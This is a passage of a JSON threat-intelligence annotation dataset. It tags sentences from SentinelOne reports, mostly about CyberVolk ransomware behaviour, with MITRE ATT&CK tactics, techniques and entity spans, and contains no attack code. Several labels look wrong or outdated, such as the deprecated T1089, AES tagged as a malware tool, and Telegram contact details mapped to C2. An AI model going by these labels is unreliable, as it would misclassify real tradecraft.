in fiery car crashes or drowning while on their yachts.", "sentence_text": "What does this mean in practice?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s84-556611", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "What does this mean in practice?", "sentence_text": "Based on the thoughts our experts have shared here, we recommend that businesses focus on the following key areas as they plan for the year ahead.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s85-dd74d6", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "Based on the thoughts our experts have shared here, we recommend that businesses focus on the following key areas as they plan for the year ahead.", "sentence_text": "Enhance Visibility and Threat Detection : Prioritize monitoring under-secured technologies like edge devices and cloud-hosted AI services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s86-2041c7", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "Enhance Visibility and Threat Detection : Prioritize monitoring under-secured technologies like edge devices and cloud-hosted AI services.", "sentence_text": "Invest in tools that provide deep visibility into network activity and endpoint behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s87-9f7291", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "Invest in tools that provide deep visibility into network activity and endpoint behavior.", "sentence_text": "Foster Collaboration\n: Break down silos by sharing threat intelligence with industry peers and government partners.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s88-e18709", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "Foster Collaboration\n: Break down silos by sharing threat intelligence with industry peers and government partners.", "sentence_text": "Open dialogue and cooperation are essential to counter collective threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s89-53ec98", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 89, "context_before": "Open dialogue and cooperation are essential to counter collective threats.", "sentence_text": "Reinforce Regulatory and Legal Frameworks :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s90-37d975", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "Reinforce Regulatory and Legal Frameworks :", "sentence_text": "Advocate for reforms that reduce legal barriers to information sharing while holding vendors and providers accountable for their role in the security ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s91-60bec1", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "Advocate for reforms that reduce legal barriers to information sharing while holding vendors and providers accountable for their role in the security ecosystem.", "sentence_text": "Invest in Resilience :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s92-575311", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 92, "context_before": "Invest in Resilience :", "sentence_text": "Address Overlooked Vulnerabilities : Reevaluate assumptions about security—whether it’s the perceived safety of Macs or the trust placed in built-in encryption tools—and adopt measures to mitigate risks in these areas.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s93-cc846e", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "Address Overlooked Vulnerabilities : Reevaluate assumptions about security—whether it’s the perceived safety of Macs or the trust placed in built-in encryption tools—and adopt measures to mitigate risks in these areas.", "sentence_text": "The path forward requires strong leadership, decisive action and a willingness to embrace change.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s94-838352", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "The path forward requires strong leadership, decisive action and a willingness to embrace change.", "sentence_text": "We know from the past successes of threat actors that businesses need help to get cybersecurity right.\nstands side-by-side with all those seeking a safer and more secure future, and we’re here to help Like this article?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s95-55e739", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 95, "context_before": "We know from the past successes of threat actors that businesses need help to get cybersecurity right.\nstands side-by-side with all those seeking a safer and more secure future, and we’re here to help Like this article?", "sentence_text": "Defeat every attack, at every stage of the threat lifecycle with SentinelOne Book a demo and see the world’s most advanced cybersecurity platform in action.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s96-580ff0", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 96, "context_before": "Defeat every attack, at every stage of the threat lifecycle with SentinelOne Book a demo and see the world’s most advanced cybersecurity platform in action.", "sentence_text": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s97-b39dcc", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 97, "context_before": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "sentence_text": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s98-db3825", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 98, "context_before": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "sentence_text": "VISIT SITE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s1-bb624f", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Between June and October 2024, CyberVolk claimed responsibility for multiple ransomware attacks.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Claimed responsibility for multiple ransomware attacks", "entities": [ { "text": "CyberVolk", "start": 31, "end": 40, "label": "ThreatActor" }, { "text": "ransomware ", "start": 77, "end": 88, "label": "MalwareTool" }, { "text": " claimed responsibility for multiple ransomware attacks.", "start": 40, "end": 96, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s2-90a758", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "Between June and October 2024, CyberVolk claimed responsibility for multiple ransomware attacks.", "sentence_text": "The main objective of CyberVolk and related groups is to leverage geopolitical issues to launch and justify attacks on public and government entities, primarily in the service of Russian government interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s3-3849a1", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "The main objective of CyberVolk and related groups is to leverage geopolitical issues to launch and justify attacks on public and government entities, primarily in the service of Russian government interests.", "sentence_text": "SentinelLABS has observed a shared codebase used by CyberVolk, AzzaSec and DoubleFace’s ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Use shared ransomware codebase", "entities": [ { "text": "CyberVolk, AzzaSec and DoubleFace’s", "start": 52, "end": 87, "label": "ThreatActor" }, { "text": "shared codebase", "start": 28, "end": 43, "label": "MalwareTool" }, { "text": "ransomware", "start": 88, "end": 98, "label": "MalwareTool" }, { "text": "shared codebase used by", "start": 28, "end": 51, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s4-3d576b", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "SentinelLABS has observed a shared codebase used by CyberVolk, AzzaSec and DoubleFace’s ransomware.", "sentence_text": "Additionally, CyberVolk has promoted other ransomware families like HexaLocker and Parano.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "promoted other ransomware families", "entities": [ { "text": " CyberVolk", "start": 13, "end": 23, "label": "ThreatActor" }, { "text": "HexaLocker", "start": 68, "end": 78, "label": "MalwareTool" }, { "text": "Parano.", "start": 83, "end": 90, "label": "MalwareTool" }, { "text": "promoted other ransomware families", "start": 28, "end": 62, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s5-057635", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Additionally, CyberVolk has promoted other ransomware families like HexaLocker and Parano.", "sentence_text": "These groups and the tools they leverage are all closely intertwined.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s6-50a291", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "These groups and the tools they leverage are all closely intertwined.", "sentence_text": "These hacktivist groups are extremely dynamic and volatile.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s7-2f3360", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "These hacktivist groups are extremely dynamic and volatile.", "sentence_text": "Introduction\nCyberVolk is a politically motivated hacktivist collective which launched its own RaaS in June 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s8-2aaaf9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "Introduction\nCyberVolk is a politically motivated hacktivist collective which launched its own RaaS in June 2024.", "sentence_text": "The group uses both DDoS and ransomware attacks in its efforts to undermine and disrupt the operations of those opposed to Russian interests.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "The group conducts distributed denial-of-service and ransomware attacks to disrupt targeted organizations.", "entities": [ { "text": "The group", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "uses both DDoS and ransomware attacks", "start": 10, "end": 47, "label": "Action" }, { "text": "ransomware", "start": 29, "end": 39, "label": "MalwareTool" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s9-b29876", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "The group uses both DDoS and ransomware attacks in its efforts to undermine and disrupt the operations of those opposed to Russian interests.", "sentence_text": "The group has become an increasingly prominent player within the cybercrime ecosystem, adopting and repurposing existing commodity malware to advance its causes.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The group adopts and repurposes existing malware to support its operations.", "entities": [ { "text": "The group", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "adopting and repurposing existing commodity malware", "start": 87, "end": 138, "label": "Action" }, { "text": "commodity malware", "start": 121, "end": 138, "label": "MalwareTool" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s10-8b67eb", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "The group has become an increasingly prominent player within the cybercrime ecosystem, adopting and repurposing existing commodity malware to advance its causes.", "sentence_text": "Highly-skilled actors within the collective expand and revise such tools, effectively making them more sophisticated as they move through various hands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s11-dac55f", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "Highly-skilled actors within the collective expand and revise such tools, effectively making them more sophisticated as they move through various hands.", "sentence_text": "This adaptability makes the group highly dynamic and increasingly challenging to track.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s12-4421f5", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "This adaptability makes the group highly dynamic and increasingly challenging to track.", "sentence_text": "Understanding the shifting nature of dynamic hacktivist collectives like CyberVolk can help organizations prepare and fortify their defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s13-93e031", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Understanding the shifting nature of dynamic hacktivist collectives like CyberVolk can help organizations prepare and fortify their defenses.", "sentence_text": "The Origins of CyberVolk Ransomware CyberVolk is a pro-India/pro-Russia “hacktivist” group that has been actively targeting entities in multiple countries.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": null, "procedure": "The CyberVolk group conducts targeting activities against entities across multiple countries.", "entities": [ { "text": "CyberVolk", "start": 36, "end": 45, "label": "ThreatActor" }, { "text": "has been actively targeting entities in multiple countries", "start": 96, "end": 154, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s14-31571e", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "The Origins of CyberVolk Ransomware CyberVolk is a pro-India/pro-Russia “hacktivist” group that has been actively targeting entities in multiple countries.", "sentence_text": "In its current form, it emerged during May 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s15-56200f", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "In its current form, it emerged during May 2024.", "sentence_text": "CyberVolk exploits current geopolitical issues, focused on launching and justifying its attacks on public and government entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s16-d55682", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "CyberVolk exploits current geopolitical issues, focused on launching and justifying its attacks on public and government entities.", "sentence_text": "CyberVolk’s branded ransomware is derived from the AzzaSec ( aka AzzaSecurity) ransomware code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s17-fcd1a9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "CyberVolk’s branded ransomware is derived from the AzzaSec ( aka AzzaSecurity) ransomware code.", "sentence_text": "It has claimed alliances with some of the same groups linked to CyberVolk such as NONAME057(16)\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s18-a5e252", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "It has claimed alliances with some of the same groups linked to CyberVolk such as NONAME057(16)\n.", "sentence_text": "Initially conducting DDoS and defacement attacks, the group later expanded into extortion and ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "The group conducts DDoS and defacement attacks and later expands its operations to include extortion and ransomware.", "entities": [ { "text": "the group", "start": 50, "end": 59, "label": "ThreatActor" }, { "text": "conducting DDoS and defacement attacks", "start": 10, "end": 48, "label": "Action" }, { "text": "expanded into extortion and ransomware", "start": 66, "end": 104, "label": "Action" }, { "text": "ransomware", "start": 94, "end": 104, "label": "MalwareTool" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s19-f12903", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Initially conducting DDoS and defacement attacks, the group later expanded into extortion and ransomware.", "sentence_text": "In June, the source-code for “AzzaSec Ransom” was leaked and subsequently adopted and adapted by multiple groups aligned with AzzaSec’s mission.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s20-93f935", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "In June, the source-code for “AzzaSec Ransom” was leaked and subsequently adopted and adapted by multiple groups aligned with AzzaSec’s mission.", "sentence_text": "Prior to its disbandment in August of 2024, AzzaSec operated under a ransomware-as-a-service (RaaS) model and pushed out multiple iterations of its Windows-centric ransomware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s21-1f192c", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "Prior to its disbandment in August of 2024, AzzaSec operated under a ransomware-as-a-service (RaaS) model and pushed out multiple iterations of its Windows-centric ransomware.", "sentence_text": "Post-AzzaSec | The Rise of CyberVolk’s RaaS Operations The CyberVolk-branded RaaS was announced in late June 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s22-d60158", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Post-AzzaSec | The Rise of CyberVolk’s RaaS Operations The CyberVolk-branded RaaS was announced in late June 2024.", "sentence_text": "The CyberVolk-modified ransomware’s development is credited to @ghostdoor_maldev and is based on the earlier AzzaSec Ransomware code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s23-609ee7", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "The CyberVolk-modified ransomware’s development is credited to @ghostdoor_maldev and is based on the earlier AzzaSec Ransomware code.", "sentence_text": "The Windows-specific payloads are written in C++.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s24-98b7a7", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "The Windows-specific payloads are written in C++.", "sentence_text": "The ransomware will terminate any running processes belonging to either Microsoft Management Console (MMC) or Task Manager.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1089", "name": "Disabling Security Tools" } ], "procedure": "terminates security or system processes", "entities": [ { "text": " ransomware", "start": 3, "end": 14, "label": "MalwareTool" }, { "text": " terminate any running processes belonging to either Microsoft Management Console (MMC) or Task Manager.", "start": 19, "end": 123, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s25-4acbc3", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "The ransomware will terminate any running processes belonging to either Microsoft Management Console (MMC) or Task Manager.", "sentence_text": "Early versions of CyberVolk Ransomware used the AES algorithm for file encryption and the SHA512 algorithm for key generation.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Encrypt files using AES and generate encryption keys using SHA512.", "entities": [ { "text": "CyberVolk Ransomware", "start": 18, "end": 38, "label": "MalwareTool" }, { "text": "used the AES algorithm for file encryption and the SHA512 algorithm for key generation", "start": 39, "end": 125, "label": "Action" }, { "text": "AES algorithm", "start": 48, "end": 61, "label": "MalwareTool" }, { "text": "SHA512 algorithm", "start": 90, "end": 106, "label": "MalwareTool" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s26-f8b2aa", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "Early versions of CyberVolk Ransomware used the AES algorithm for file encryption and the SHA512 algorithm for key generation.", "sentence_text": "This was later updated to “ChaCha20-Poly1305 + AES + RSA + Quantum resistant algorithms” according to posts on the group’s Telegram.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "upgraded ransomware encryption methods", "entities": [ { "text": "Telegram.", "start": 123, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "updated", "start": 15, "end": 22, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s27-51070f", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "This was later updated to “ChaCha20-Poly1305 + AES + RSA + Quantum resistant algorithms” according to posts on the group’s Telegram.", "sentence_text": "The payment screen used by CyberVolk Ransomware displays the decryption timer along with payment details.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ransomware displays ransom/payment interface to victims", "entities": [ { "text": "CyberVolk", "start": 27, "end": 36, "label": "ThreatActor" }, { "text": "CyberVolk Ransomware", "start": 27, "end": 47, "label": "MalwareTool" }, { "text": "displays the decryption timer along with payment details.", "start": 48, "end": 105, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s28-84cbda", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "The payment screen used by CyberVolk Ransomware displays the decryption timer along with payment details.", "sentence_text": "CyberVolk ransomware supports BTC and USDT payments.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "ransomware accepts cryptocurrency payments", "entities": [ { "text": "CyberVolk", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "CyberVolk ransomware", "start": 0, "end": 20, "label": "MalwareTool" }, { "text": "BTC and USDT", "start": 30, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "supports BTC and USDT payments", "start": 21, "end": 51, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s29-9acb25", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "CyberVolk ransomware supports BTC and USDT payments.", "sentence_text": "A ransom note named CyberVolk_Readme.txt containing the same contact details presented in the wallpaper and payment screens is also dropped to disk.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "drops ransom note to disk", "entities": [ { "text": "CyberVolk", "start": 20, "end": 29, "label": "ThreatActor" }, { "text": "CyberVolk_Readme.txt", "start": 20, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "dropped to disk.", "start": 132, "end": 148, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s30-82add4", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "A ransom note named CyberVolk_Readme.txt containing the same contact details presented in the wallpaper and payment screens is also dropped to disk.", "sentence_text": "Telegram contact details are provided as well.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "provides contact information", "entities": [ { "text": "Telegram contact details", "start": 0, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "provided", "start": 29, "end": 37, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s31-f77883", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Telegram contact details are provided as well.", "sentence_text": "The\n.CyberVolk\nextension is added to affected files:\nThe decryption timer is controlled via a time.dat file written to %appdata%\\Roaming directory.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "file encryption with extension modification; uses local file to manage decryption timer", "entities": [ { "text": "%appdata%\\Roaming directory.", "start": 119, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "time.dat file", "start": 94, "end": 107, "label": "Infrastructure_Indicator" }, { "text": ".CyberVolk\nextension is added", "start": 4, "end": 33, "label": "Action" }, { "text": "decryption timer is controlled via a time.dat file written to", "start": 57, "end": 118, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s32-a2e4b9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "The\n.CyberVolk\nextension is added to affected files:\nThe decryption timer is controlled via a time.dat file written to %appdata%\\Roaming directory.", "sentence_text": "The timeout is set to 5 hours in CyberVolk samples analyzed by SentinelOne.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "sets ransomware decryption timeout to 5 hours", "entities": [ { "text": "samples", "start": 43, "end": 50, "label": "MalwareTool" }, { "text": "CyberVolk samples", "start": 33, "end": 50, "label": "MalwareTool" }, { "text": "timeout is set to 5 hours", "start": 4, "end": 29, "label": "Action" }, { "text": "CyberVolk", "start": 33, "end": 42, "label": "ThreatActor" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s33-685eb5", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "The timeout is set to 5 hours in CyberVolk samples analyzed by SentinelOne.", "sentence_text": "This functionality is mirrored in the Invisible Ransom payloads as well, as they are based on the same codebase (AzzaSec Ransom).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s34-9c789c", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "This functionality is mirrored in the Invisible Ransom payloads as well, as they are based on the same codebase (AzzaSec Ransom).", "sentence_text": "The\ntime.dat\nfile stores the defined timeout value in seconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s35-c23830", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "The\ntime.dat\nfile stores the defined timeout value in seconds.", "sentence_text": "Default builds of Invisible Ransom (or CyberVolk) will write time.dat with a value of seconds (roughly 5 hours).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s36-7ed0ad", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "Default builds of Invisible Ransom (or CyberVolk) will write time.dat with a value of seconds (roughly 5 hours).", "sentence_text": "These campaigns were part of “#OpJP” which extended through October.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s37-9884e4", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "These campaigns were part of “#OpJP” which extended through October.", "sentence_text": "Victims of “#OpJP” include:\nThe Japan Foundation Japan Oceanographic Data Center (JODC)\nThe Japan Meteorological Agency (JMA)\nTokyo Global Information System Centre CyberVolk Associates | Invisible/Doubleface Team Ransomware Invisible or Doubleface ransomware is associated with “Doubleface Team” ( aka Double Alliance).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s38-fe4219", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Victims of “#OpJP” include:\nThe Japan Foundation Japan Oceanographic Data Center (JODC)\nThe Japan Meteorological Agency (JMA)\nTokyo Global Information System Centre CyberVolk Associates | Invisible/Doubleface Team Ransomware Invisible or Doubleface ransomware is associated with “Doubleface Team” ( aka Double Alliance).", "sentence_text": "CyberVolk began promoting Doubleface on September 22, 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s39-8dfda9", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "CyberVolk began promoting Doubleface on September 22, 2024.", "sentence_text": "Invisible/Doubleface ransomware payloads function in an identical manner to CyberVolk-branded ransomware samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-68_SentinelOne_report-p1-s40-2f7ca8", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "Invisible/Doubleface ransomware payloads function in an identical manner to CyberVolk-branded ransomware samples.", "sentence_text": "This includes duplication of the 5-hour timeout setting and active wallpaper modification used for input of the decryption key and displaying payment details.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491", "name": "Defacement" } ], "procedure": "duplication of the 5-hour timeout setting and active wallpaper modification", "entities": [ { "text": "duplication of the 5-hour timeout setting and active wallpaper modification", "start": 14, "end": 89, "label": "Action" } ] }, { "uid": "sentinel-68_SentinelOne_report-p1-s41-1d0c39", "source": "sentinel", "doc_id": "68_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "This includes duplication of the 5-hour timeout setting and active 